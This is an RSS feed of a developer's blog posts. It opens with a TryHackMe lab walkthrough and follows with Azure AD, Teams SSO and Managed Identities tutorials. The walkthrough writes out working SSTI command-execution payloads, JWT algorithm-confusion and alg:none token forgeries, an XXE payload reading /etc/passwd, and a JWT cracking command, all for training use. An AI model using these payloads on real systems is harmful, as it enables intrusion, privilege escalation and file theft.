<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Tobias Urban</title>
    <description>The latest articles on Forem by Tobias Urban (@urmade).</description>
    <link>https://forem.com/urmade</link>
    
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/urmade"/>
    <language>en</language>
    <item>
      <title>Write-Up: TryHackMe Web Fundamentals - ZTH: Obscure Web Vulns</title>
      <dc:creator>Tobias Urban</dc:creator>
      <pubDate>Wed, 05 Jan 2022 08:42:25 +0000</pubDate>
      <link>https://forem.com/urmade/write-up-tryhackme-web-fundamentals-zth-obscure-web-vulns-bfe</link>
      <guid>https://forem.com/urmade/write-up-tryhackme-web-fundamentals-zth-obscure-web-vulns-bfe</guid>
      <description>&lt;h1&gt;
  
  
  Write-Up: TryHackMe Web Fundamentals - ZTH: Obscure Web Vulns
&lt;/h1&gt;

&lt;blockquote&gt;
&lt;p&gt;This is a walkthrough through the &lt;a href="https://tryhackme.com/room/zthobscurewebvulns"&gt;TryHackMe course&lt;/a&gt; on Obscure Web Vulnerabilities and aims to provide help for learners who get stuck on certain parts of the course.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Agenda
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Section 1: SSTI&lt;/li&gt;
&lt;li&gt;Section 2: CSRF&lt;/li&gt;
&lt;li&gt;Section 3: JWT Algorithm vulnerability&lt;/li&gt;
&lt;li&gt;Section 3.5: JWT header vulnerability&lt;/li&gt;
&lt;li&gt;Section 4: XXE&lt;/li&gt;
&lt;li&gt;Bonus Section: JWT Brute-Forcing&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Section 1: SSTI
&lt;/h2&gt;

&lt;p&gt;This walkthrough uses the manual approach to receive the flag. &lt;/p&gt;

&lt;p&gt;When you connect to the demo application, you can check that the site is vulnerable for SSTI attacks by typing in &lt;code&gt;{{3+3}}&lt;/code&gt;. If the site returns &lt;code&gt;6&lt;/code&gt; instead of the literal &lt;code&gt;{{3+3}}&lt;/code&gt;, you know that the page just interpreted your statement.&lt;/p&gt;

&lt;p&gt;Now that we know we can inject statements, let's use this to read out the hidden flag. As specified in the challenge, the flag is stored under &lt;code&gt;\flag&lt;/code&gt;, so all we have to do is read out the file with the command provided:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;{{ ''.__class__.__mro__[2].__subclasses__()[40]('/flag').read() }}&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;or via command line injection:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;{{config.__class__.__init__.__globals__['os'].popen('cat /flag').read()}}&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;P.S.: If you want to look up other injections, read through the &lt;a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#basic-injection"&gt;provided repository&lt;/a&gt;. This project is using the Jinja2 templating engine.&lt;/p&gt;

&lt;h2&gt;
  
  
  Section 2: CSRF
&lt;/h2&gt;

&lt;p&gt;This section does not have an actual challenge, but it requires you to get familiar with the &lt;code&gt;xsrfprobe&lt;/code&gt; library. You could either install the library to your device and use &lt;code&gt;xsrfprobe --help&lt;/code&gt; to find the right argument for generating a POC, or use the &lt;a href="https://github.com/0xInfection/XSRFProbe/wiki/General-Usage"&gt;official documentation&lt;/a&gt; from the web. Hint: Find out which command would let you craft an actual, malicious request.&lt;/p&gt;

&lt;p&gt;For the practical "challenge", you could build a simple website which authenticates users via GET request and stores the session in a cookie. Then try from another page to GET your existing page and observe in the network traffic that your second page can make authenticated requests on behalf of your user.&lt;/p&gt;

&lt;h2&gt;
  
  
  Section 3: JWT Algorithm vulnerability
&lt;/h2&gt;

&lt;p&gt;This is probably the toughest section in this whole room, so don't get frustrated if it might takes several tries to get this done!&lt;/p&gt;

&lt;p&gt;To recap the exploit, the basic idea is to take a token which was signed with using RS-SHA (and therefore a secret, hidden private key) and transform it into a token signed with HS-SHA, which uses a shared secret (public key). If the receiving application doesn't differentiate between RS-SHA and HS-SHA and if the server creating the tokens uses the same keys, this means we can forge any token and trick the system into believing it is legit.&lt;/p&gt;

&lt;p&gt;As every token issued in the lab has a lifetime of only two minutes, you will have to complete all steps necessary in that timeframe. I would recommend preparing the "static" parts and then getting a new token and running through all "token-specific" steps.&lt;/p&gt;

&lt;p&gt;First of all you will need to get and prepare the public key. You can download the public key under &lt;code&gt;/public&lt;/code&gt;, and once you have downloaded it you can convert the key into HEX using this command (in an UNIX/Bash shell):&lt;/p&gt;

&lt;p&gt;&lt;code&gt;cat ./public.pem | xxd -p | tr -d "\\n"&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Copy and paste the resulting string as we'll need that in a bit!&lt;/p&gt;

&lt;p&gt;Next up let's look at the JWT token itself. If you take the token the lab prepared for you and parse it (for example by pasting it into &lt;a href="https://jwt.io"&gt;jwt.io&lt;/a&gt;), you will see a header which specifies that RS-SHA256 was used for the signature. What you want to do is create a new token header which specifies that we want to use HS-SHA256. You can do this right in jwt.io by changing "RS-SHA256" to "HS-SHA256". Note that this part is the same for all tokens we will generate. So you can copy it out and we have the first third of our token ready!&lt;/p&gt;

&lt;p&gt;Now you should have a really long string resembling your public key in HEX as well as a base64 encoded string resembling your token header. All that is left now is re-generating the signature and crafting the final JWT token. To create the new hash, the room already gives us the right command:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;echo -n "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.your-token-body" | openssl dgst -sha256 -mac HMAC -macopt hexkey:your-key-in-hex&lt;br&gt;
&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;your-key-in-hex&lt;/code&gt; is the same for every token we will generate, so the only token-specific info we need to inject is the body of our current token (you don't need to change anything here, but every token will have a slightly different body). This should give you another string which already resembles our final hash.&lt;/p&gt;

&lt;p&gt;In order to fit into our JWT token, we need that hash in a Base64 format though. Make sure you have python installed on your device and run the following command:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;python -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('hash-from-last-step')).replace('=','')\")"&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Now we just put everything back together and we have our finalised token. It should look something like this:&lt;br&gt;
&lt;code&gt;eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.payload-from-original-JWT.Hash-from-last-step&lt;/code&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Section 3.5: JWT header vulnerability
&lt;/h2&gt;

&lt;p&gt;To get started, sign in with any account and find the JWT token securing your session in the cookies (the cookie is called token). Copy that JWT token and paste it into &lt;a href="https://jwt.io"&gt;jwt.io&lt;/a&gt;. In your payload, you will see an attribute "role" where you should set the value to "admin". &lt;/p&gt;

&lt;p&gt;Right now though, the token would be invalid as the signature doesn't match the token anymore. Therefore we also have to change the header and specify that the token shouldn't have a signature all together. As jwt.io won't let you change headers of a token, just replace the current header with &lt;code&gt;eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0&lt;/code&gt;. Decode this base64 string to make sure you understand what we are doing here. &lt;/p&gt;

&lt;p&gt;Now put your token back together, which should look something like this: &lt;code&gt;eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.new-body-with-role:admin.&lt;/code&gt;&lt;br&gt;
(Please note the trailing &lt;code&gt;.&lt;/code&gt;. You will need this in order to create a valid JWT token)&lt;/p&gt;

&lt;p&gt;Copy that new token and replace your current "token" cookie with that new JWT token. If you now re-load the page you should be signed in as an admin!&lt;/p&gt;
&lt;h2&gt;
  
  
  Section 4: XXE
&lt;/h2&gt;

&lt;p&gt;Make sure you have Burp Suite, OWASP Zap or a similar tool installed for this challenge as we will have to change the request structure in order to achieve the challenge.&lt;/p&gt;

&lt;p&gt;When you open the form, submit it with some random values. Give each field a unique value so that you can easily see which value will be echoed in the pages output. This should reveal that the value of the email field is posted in the page, so this is the value we'll look at closer. Do another request and intercept it in your tool of choice so we can modify the payload.&lt;/p&gt;

&lt;p&gt;In the challenge, we are asked how many users exist on the target server and what user has the specific ID "1000". Remember that the "/etc/passwd" keeps track of every single user in the system and also references the unique user ID, so this file is all we really need.&lt;/p&gt;

&lt;p&gt;First off we need to define a new XML variable that we can display in the email field. In this challenge we are interested in the "/etc/passwd" file of the server. Define a new variable like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;!DOCTYPE data [ &amp;lt;!ELEMENT data ANY&amp;gt; 
&amp;lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &amp;gt;]&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;and call it like this:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&amp;lt;email&amp;gt;&amp;amp;xxe;&amp;lt;/email&amp;gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Your full payload should look like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
&amp;lt;!DOCTYPE data [ &amp;lt;!ELEMENT data ANY&amp;gt; 
&amp;lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &amp;gt;]&amp;gt;
&amp;lt;root&amp;gt;
&amp;lt;name&amp;gt;aa&amp;lt;/name&amp;gt;
&amp;lt;tel&amp;gt;aa&amp;lt;/tel&amp;gt;
&amp;lt;email&amp;gt;&amp;amp;xxe;&amp;lt;/email&amp;gt;
&amp;lt;password&amp;gt;aa&amp;lt;/password&amp;gt;
&amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Sending the request with this modfied payload should reveal the "passwd" file. Copy this into a text editor for easier reading, count the entries (each line is an entry) to get the number of users and search for the user with the ID "1000".&lt;/p&gt;

&lt;h2&gt;
  
  
  Bonus Section: JWT Brute-Forcing
&lt;/h2&gt;

&lt;p&gt;This section is really straight forward. Install the &lt;code&gt;jwt-cracker&lt;/code&gt; library on your device and then run &lt;code&gt;jwt-cracker eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.it4Lj1WEPkrhRo9a2-XHMGtYburgHbdS5s7Iuc1YKOE abcdefghijklmnopqrstuvwxyz 4&lt;/code&gt; to crack the actual password. &lt;/p&gt;

&lt;p&gt;We know from the answer pattern that we're looking for a string with 4 characters, so make sure to specify this number as otherwise the tool will try 26^12 combinations instead of 26^4 combinations, which is a lot more! (You do the math, but not specifying the secret length will result in 20 billion times more operations, or put differently you'll spend quite some time staring at your screen).&lt;/p&gt;

&lt;h1&gt;
  
  
  Wrap-Up
&lt;/h1&gt;

&lt;p&gt;I hope this write-down could help you understand some of the more complicated parts of this lab. If you have any feedback, questions or suggestions please comment it under this post!&lt;/p&gt;

</description>
      <category>tryhackme</category>
      <category>hacking</category>
      <category>security</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>Azure Active Directory Application Creator</title>
      <dc:creator>Tobias Urban</dc:creator>
      <pubDate>Mon, 24 Aug 2020 10:13:36 +0000</pubDate>
      <link>https://forem.com/urmade/azure-active-directory-application-creator-3m8m</link>
      <guid>https://forem.com/urmade/azure-active-directory-application-creator-3m8m</guid>
      <description>&lt;h3&gt;
  
  
  Azure Active Directory Application Creator
&lt;/h3&gt;

&lt;h3&gt;
  
  
  Submission Category: DIY Deployments
&lt;/h3&gt;

&lt;h3&gt;
  
  
  Project:
&lt;/h3&gt;


&lt;div class="ltag-github-readme-tag"&gt;
  &lt;div class="readme-overview"&gt;
    &lt;h2&gt;
      &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--566lAguM--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev.to/assets/github-logo-5a155e1f9a670af7944dd5e12375bc76ed542ea80224905ecaf878b9157cdefc.svg" alt="GitHub logo"&gt;
      &lt;a href="https://github.com/urmade"&gt;
        urmade
      &lt;/a&gt; / &lt;a href="https://github.com/urmade/AAD_Service-Principal_Action"&gt;
        AAD_Service-Principal_Action
      &lt;/a&gt;
    &lt;/h2&gt;
    &lt;h3&gt;
      GitHub Action to create a new Azure Active Directory Service Principal within your workflow.
    &lt;/h3&gt;
  &lt;/div&gt;
  &lt;div class="ltag-github-body"&gt;
    
&lt;div id="readme" class="md"&gt;
&lt;h1&gt;
GitHub Action to create new Application registrations in Azure Active Directory&lt;/h1&gt;
&lt;p&gt;This action enables you to automize the creation of Azure Active Directory applications in order to test your graph-powered or Single Sign-on enabled application.&lt;/p&gt;
&lt;h2&gt;
How to use&lt;/h2&gt;
&lt;p&gt;In order to generate new applications automatically, you need an existing application that the tenant administrator has granted the Application.ReadWrite.All scope.&lt;/p&gt;
&lt;p&gt;Mandatory parameters:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;adminApplicationId: Client ID of an existing application with the Application.ReadWrite.All scope&lt;/li&gt;
&lt;li&gt;adminApplicationSecret: Client secret of the same existing application with the Application.ReadWrite.All scope&lt;/li&gt;
&lt;li&gt;tenantId: ID of the tenant in which the new application should be created&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Optional parameters:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;applicationName: Any string, is set as the name of the application and displayed to users on sign-in&lt;/li&gt;
&lt;li&gt;redirectUrl: A list or URLs that should be registered as redirect URLs (Format: "URL,URL,URL")&lt;/li&gt;
&lt;li&gt;logoutUrl: A single URL that should be registered as the logout URL&lt;/li&gt;
&lt;li&gt;allowImplicitIdToken: Boolean indicator if the ID token acquisition…&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
  &lt;/div&gt;
  &lt;div class="gh-btn-container"&gt;&lt;a class="gh-btn" href="https://github.com/urmade/AAD_Service-Principal_Action"&gt;View on GitHub&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;


&lt;h3&gt;
  
  
  Additional Resources / Info
&lt;/h3&gt;

&lt;p&gt;This tool aims to automate the rollout process (currently only in testing environments) for Azure Active Directory Service Principals. This enables a smoother DevOps experiences when developing in the Microsoft Office ecosystem where one may want to test their rollout experience in a more automated way.&lt;/p&gt;

</description>
      <category>actionshackathon</category>
    </item>
    <item>
      <title>Seamless SSO login for Microsoft Teams Tabs</title>
      <dc:creator>Tobias Urban</dc:creator>
      <pubDate>Sun, 17 Nov 2019 13:17:44 +0000</pubDate>
      <link>https://forem.com/urmade/seamless-sso-login-for-microsoft-teams-tabs-3n8k</link>
      <guid>https://forem.com/urmade/seamless-sso-login-for-microsoft-teams-tabs-3n8k</guid>
      <description>&lt;h1&gt;
  
  
  Maximize security AND user experience
&lt;/h1&gt;

&lt;p&gt;Until now, it was only possible to build authentication in Microsoft Teams tabs by this flow: You spawn a popup, the user manually authenticates, and then (best case) you stored some sort of session token in the users locale storage so that you wouldn't have to re-authenticate the user everytime they want to use your tab. In the end, you had to take care of building the popup flow, managing sessions for the users and deciding on in which frequency you want to re-authenticate the user to make sure they are still in a safe context.&lt;/p&gt;

&lt;h2&gt;
  
  
  How to build a secure and seamless experience
&lt;/h2&gt;

&lt;p&gt;In a nutshell, you only need three things to implement a simple Single Sign On mechanism in Teams: An Azure Active Directory App registration, a Teams manifest and a HTML page that hosts less than 10 lines of JavaScript. You can find a complete implementation of this in &lt;a href="https://github.com/Urmade/TeamsTabSSO"&gt;this GitHub repository&lt;/a&gt;. Let's start with Azure Active Directory.&lt;/p&gt;

&lt;h3&gt;
  
  
  Configuring an App registration
&lt;/h3&gt;

&lt;p&gt;When acquiring a token for your user, Teams uses the so-called OAuth2 on-behalf flow. This means: Users use your app and give your app the consent that it can access their data. Your app then opens to a second app (that is managed by Microsoft, for simplicity it is referenced as &lt;em&gt;Microsoft App&lt;/em&gt; throughout this tutorial) and allows that app to access everything that your app can access. The Microsoft app then acquires a new token (in your name), and returns you only an id_token that is then exposed to the Teams client. &lt;/p&gt;

&lt;p&gt;What are reasons for this way of doing it? For one, you don't have to care about implementing this whole flow yourself. The Microsoft App runs on a server that handles token acquisition, whilst you can sit back and wait for a token to return. Another nice side effect of this is that Microsoft automatically filters the answer it gets back from Azure Active Directory when it acquires the user token, and only gives you an id_token. This token already contains information about the user, but it cannot be used to make requests against any other service. Therefore the token is worthless upon the information it contains itself, minimizing the attack surface on the users client.&lt;br&gt;
Secondly it is a more secure flow whilst enabling great flexibility. Usually when you want to receive any user tokens directly in the browser, you have to provide a client_id and a client_secret to the client. With these two values, basically everyone else could acquire tokens in your name as well. With the on-behalf flow, Teams only knows the client_id (and even that only through the manifest), and the Microsoft App can identify the id and acquire a token with its own, hidden id and secret.&lt;/p&gt;

&lt;p&gt;But how do we actually register an App to work with Teams Single Sign On? &lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The process consists of basically three steps: Telling the Azure Active Directory that we want to have an application, giving it the permissions to read the users profile, and opening this application to the &lt;em&gt;Microsoft App&lt;/em&gt; so that this app can access the users profile on our behalf. &lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The process is well-documented in &lt;a href="https://docs.microsoft.com/en-us/microsoftteams/platform/tabs/how-to/authentication/auth-aad-sso#1-create-your-aad-application-in-azure"&gt;this article&lt;/a&gt;, and you can find a step-by-step tutorial right here: &lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Head to &lt;a href="https://portal.azure.com"&gt;https://portal.azure.com&lt;/a&gt; and log in with your credentials.&lt;/li&gt;
&lt;li&gt;Search for &lt;strong&gt;Azure Active Directory&lt;/strong&gt; and select it.&lt;/li&gt;
&lt;li&gt;On the AAD Dashboard, click on &lt;strong&gt;App registrations&lt;/strong&gt; in the left-hand navigation.&lt;/li&gt;
&lt;li&gt;Click on &lt;strong&gt;New registration&lt;/strong&gt; in the top navigation bar.

&lt;ol&gt;
&lt;li&gt;Give it a name that people understand. It will be eventually shown to them whilst using your app.&lt;/li&gt;
&lt;li&gt;In &lt;strong&gt;Supported Account types&lt;/strong&gt; go for &lt;strong&gt;Accounts in any organizational directory&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Leave the &lt;strong&gt;Redirect URI&lt;/strong&gt; blank.&lt;/li&gt;
&lt;li&gt;Click on &lt;strong&gt;Register&lt;/strong&gt;.&lt;/li&gt;
&lt;/ol&gt;


&lt;/li&gt;
&lt;li&gt;In your newly created app, click on &lt;strong&gt;Expose an API&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;On &lt;strong&gt;Application ID URI&lt;/strong&gt;, click on &lt;strong&gt;Set&lt;/strong&gt;. The API must have the following structure: api://&lt;em&gt;yourendpoint&lt;/em&gt;/&lt;em&gt;client_id&lt;/em&gt;. For example: api://mydomain.com/00000000-0000-0000-0000-00000000000000.&lt;/li&gt;
&lt;li&gt;Next, click on &lt;strong&gt;Add a scope&lt;/strong&gt;. Give it the scope name &lt;strong&gt;access_as_user&lt;/strong&gt;, make it consentable by users and admins and give it a display name and description that is understandable for your users. Make sure its State is &lt;strong&gt;enabled&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Click on &lt;strong&gt;Add a client application&lt;/strong&gt;. &lt;/li&gt;
&lt;li&gt;Give the following client_ids access to your API: &lt;strong&gt;5e3ce6c0-2b1f-4285-8d4b-75ee78787346&lt;/strong&gt; and &lt;strong&gt;1fec8e78-bce4-4aaf-ab1b-5451cc387264&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;On the left-hand navigation, click on &lt;strong&gt;API permissions&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Click on &lt;strong&gt;Add a permission&lt;/strong&gt;, then &lt;strong&gt;Microsoft Graph&lt;/strong&gt;, &lt;strong&gt;Delegated permissions&lt;/strong&gt; and select &lt;em&gt;email&lt;/em&gt;,&lt;em&gt;offline_access&lt;/em&gt;,&lt;em&gt;openid&lt;/em&gt; and &lt;em&gt;profile&lt;/em&gt;. Click on &lt;strong&gt;Add permissions&lt;/strong&gt;.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Here you go, you have everything in place with Azure Active Directory to receive Single-Sign-On tokens!&lt;/p&gt;

&lt;h3&gt;
  
  
  Creating a Teams app manifest
&lt;/h3&gt;

&lt;p&gt;Basically all you have to do to enable SSO in your Teams tabs is to specify your API endpoint in the Teams manifest. &lt;/p&gt;

&lt;p&gt;To register a Teams application with a basic tab, you can follow &lt;a href="https://docs.microsoft.com/en-us/microsoftteams/platform/concepts/build-and-test/app-studio-overview"&gt;this article&lt;/a&gt; as a starting point. There is only one additional step to configure Single Sign On: In App Studio, go to &lt;strong&gt;Domains and Permissions&lt;/strong&gt; and click on &lt;strong&gt;Set up&lt;/strong&gt; under &lt;strong&gt;Web App single sign-on&lt;/strong&gt;. Here you have to provide the client ID that you got from the AAD app registration as well as the resource URL you specified (in AAD, it was called &lt;em&gt;Application ID URI&lt;/em&gt;, e.g. api://mydomain.com/00000000-0000-0000-0000-00000000000000). That is all you have to do! If you want to configure these properties right in the manifest.json, you can follow &lt;a href="https://docs.microsoft.com/en-us/microsoftteams/platform/tabs/how-to/authentication/auth-aad-sso#2-update-your-microsoft-teams-application-manifest"&gt;this documentation&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Getting your single sign-on token
&lt;/h3&gt;

&lt;p&gt;Now that all setup steps are done, you can implement the actual single sign-on in the tab. This can be done in only 5 lines of code:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;microsoftTeams.initialize();
var authTokenRequest = {
    successCallback: function (result) {console.log(result)},
    failureCallback: function (error) {console.log(error)}
};
microsoftTeams.authentication.getAuthToken(authTokenRequest);
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;code&gt;result&lt;/code&gt; will contain the id_token with the users information. This is a JSON Web Token and can be decrypted using various JWT libraries. This token contains the name, mail-adress and AAD ID of the user. If you only need this information, you are now officially done! &lt;/p&gt;

&lt;h2&gt;
  
  
  Limitations and workarounds
&lt;/h2&gt;

&lt;p&gt;This new mechanism is optimized around giving you a quick, seamless and verified information around who is using your application. In OAuth2 terms, it &lt;em&gt;authenticates&lt;/em&gt; your user (if your app uses Azure Active Directory as the identity control plane). This leaves some use cases open where you still have to implement some workarounds.&lt;/p&gt;

&lt;h3&gt;
  
  
  Your app must use Azure Active Directory as its Identity provider
&lt;/h3&gt;

&lt;p&gt;This flow only works with returing you the Azure Active Directory information about an user. If your app has its own Identity provider, you can't use this Single Sign On flow to authenticate your users. There of course is a way to still authenticate your users, but you are responsible for doing this and it usually involves a popup asking your users to log in manually. You can check out &lt;a href="https://dev.to/urmade/building-a-microsoft-teams-connector-2bhp#securing-the-connector-adding-authentication"&gt;this article&lt;/a&gt; if you want to learn more about how to build such a mechanism.&lt;/p&gt;

&lt;h3&gt;
  
  
  You cannot make any further requests with the token
&lt;/h3&gt;

&lt;p&gt;In the process, you get an id_token returned. This token is only used to provide information about the user and cannot the used for &lt;em&gt;authorization&lt;/em&gt;, meaning giving you access to any other confidential data that you could ask for from Azure Active Directory. In fact, the SSO mechanism only implements half of the On-behalf-of OAuth2 flow. The Microsoft App gives you a token that contains data that was accessed in the name of your app, but you still have to convert it into a token that can make additional requests, as only then it is truly &lt;em&gt;your&lt;/em&gt; app that is accessing that data.&lt;/p&gt;

&lt;p&gt;Converting a token that another app has scheduled for you into a token that you got yourself is well documented in &lt;a href="https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-on-behalf-of-flow#service-to-service-access-token-request"&gt;this article&lt;/a&gt;. A very simple implementation could look like this: When you get the token from the client, send it to your tab backend.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;fetch("/storeToken?token=" + result)&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;In your backend (we're using TypeScript in this example) you can then trade the id_token for an access_token by following the OAuth2 specification. The most important value is the client_secret that verifies that you are the actual owner of this app who is allowed to make requests against Azure Active Directory / Microsoft Graph.&lt;/p&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;app.get("/storeToken", (req,res) =&amp;gt; {&lt;br&gt;
const idToken = req.query.token;&lt;br&gt;
request("&lt;a href="https://login.microsoftonline.com/common/oauth2/v2.0/token"&gt;https://login.microsoftonline.com/common/oauth2/v2.0/token&lt;/a&gt;", {&lt;br&gt;
    "method": "POST",&lt;br&gt;
    "headers": {&lt;br&gt;
        "Content-Type": "application/x-www-form-urlencoded"&lt;br&gt;
    },&lt;br&gt;
    "form": {&lt;br&gt;
        "grant_type": "urn:ietf:params:oauth:grant-type:jwt-bearer",&lt;br&gt;
        "client_id": process.env.CLIENTID,&lt;br&gt;
        "client_secret": process.env.CLIENTSECRET,&lt;br&gt;
        "scope": "user.read",&lt;br&gt;
        "requested_token_use": "on_behalf_of",&lt;br&gt;
        "assertion": idToken&lt;br&gt;
    }&lt;br&gt;
}, (error,response,body) =&amp;gt; {&lt;br&gt;
    const access_token = JSON.parse(body)["access_token"];&lt;br&gt;
    })&lt;br&gt;
})&lt;br&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;h3&gt;
&lt;br&gt;
  &lt;br&gt;
  &lt;br&gt;
  You only get a certain set of scopes&lt;br&gt;
&lt;/h3&gt;

&lt;p&gt;When using SSO with Teams tabs, the token issued will only contain five scopes: &lt;code&gt;user.read&lt;/code&gt;, &lt;code&gt;email&lt;/code&gt;, &lt;code&gt;profile&lt;/code&gt;, &lt;code&gt;openid&lt;/code&gt; and &lt;code&gt;offline_access&lt;/code&gt;. Oftentimes, this is not enough when your tab wants to learn more about the context of the user or enables them to work with their Graph data. Before you can exchange this token for an access_token with further scopes in your backend, the user has to initially consent that you are allowed to use this data. For implementing this you can refer to &lt;a href="https://docs.microsoft.com/en-us/microsoftteams/platform/tabs/how-to/authentication/auth-aad-sso#asking-for-additional-consent-using-the-auth-api"&gt;this documentation&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>microsoftteams</category>
      <category>security</category>
      <category>webdev</category>
      <category>azureactivedirectory</category>
    </item>
    <item>
      <title>Low code, ultimate security - Secure Azure with Managed Identities</title>
      <dc:creator>Tobias Urban</dc:creator>
      <pubDate>Wed, 06 Nov 2019 22:34:39 +0000</pubDate>
      <link>https://forem.com/urmade/low-code-ultimate-security-secure-azure-with-managed-identities-m09</link>
      <guid>https://forem.com/urmade/low-code-ultimate-security-secure-azure-with-managed-identities-m09</guid>
      <description>&lt;h1&gt;
  
  
  Are your apps really secure?
&lt;/h1&gt;

&lt;p&gt;TL;DR: Azure Managed Identities are awesome! Give your services an Identity, configure permissions between resources and let Azure handle all access management for you. How to implement this? Here you go.&lt;/p&gt;

&lt;p&gt;Can you remember your last side project? For me, it is always a time of hype. I am a cloud enthusiast, so I always have plenty of stuff in my mind on what to do. Let's go with Kubernetes, but Serverless seems pretty cool too, and didn't they blog lately about that new feature in Web Apps that sounded fun? Maybe I just bring in all of them?&lt;br&gt;
And while building a concept and coding the logic of your side project is a real joy, there comes this point where I always start wondering: "Wait, maybe that thing I built could be cool for others as well. Okay, then I definetly have to spend more time on the UI. And I have to make it more secure. I have to make all of it more secure. Why did I choose to bring in all these components?"&lt;/p&gt;

&lt;p&gt;Securing the interaction between different resources in a product can be time-consuming. You have to connect all resources by hand, keep secrets up to date in your environment variables, and usually build dependencies in your code to some sort of security service or library (for the Azure context, let's take Key Vault for storing your secrets and certificates as an example). You start investing a lot of time in your security assets, and that's time you could spend on value-bringing features as well. &lt;/p&gt;

&lt;p&gt;But luckily, Azure is here to help: With Managed Identities, you can assign an Azure Active Directory Identity to many of your Azure services and give them permissions to other resources, just as you would do with users. That way, you don't have to care about access management, and Azure routes and resolves all access requests internally for you.&lt;/p&gt;

&lt;h2&gt;
  
  
  What are these managed identities really?
&lt;/h2&gt;

&lt;p&gt;If you have never worked with Azure Active Directory (called AAD in short) before, here's the summary: AAD is Microsofts Identity Management tool. That means, every user, all of his permissions and a lot of other objects in your organizations are listed there and with every sign-in to some resource. AAD knows exactly what you can or cannot do. Nearly all of Microsofts first-party as well as a lot of third-party tools use AAD for their identity management. For example, you can thank AAD for keeping your Office secure, and making sure only you see your OneDrive files.&lt;/p&gt;

&lt;p&gt;And exactly this Azure Active Directory can be used to regulate service communication as well: Just give your service an identity (let's call it Alex) and specify all other resources that Alex can talk to.&lt;/p&gt;

&lt;p&gt;Okay, how can Alex do that? &lt;/p&gt;

&lt;h2&gt;
  
  
  Bringing it to life: Assigning an identity
&lt;/h2&gt;

&lt;p&gt;When we gave our service its identity, we created two things in AAD: An Application registration and a service principal. An application registration basically just tells AAD: "Hey, here is some service that wants to call some of your APIs" (This isn't the most accurate or wholesome description ever, but it serves my cause. If you want to go deeper, &lt;a href="https://docs.microsoft.com/en-us/azure/active-directory/develop/app-objects-and-service-principals"&gt;start here&lt;/a&gt;). With that application registration also comes a service principal object. This is a modified version of a basic user in AAD (like Alice and Bob), with the restriction that it only can talk to other Azure resources. This service principal is attached to our application registration, and it is linked to its assigned managed identity. If the managed identity is deleted, the linked service principal is automatically removed as well.&lt;/p&gt;

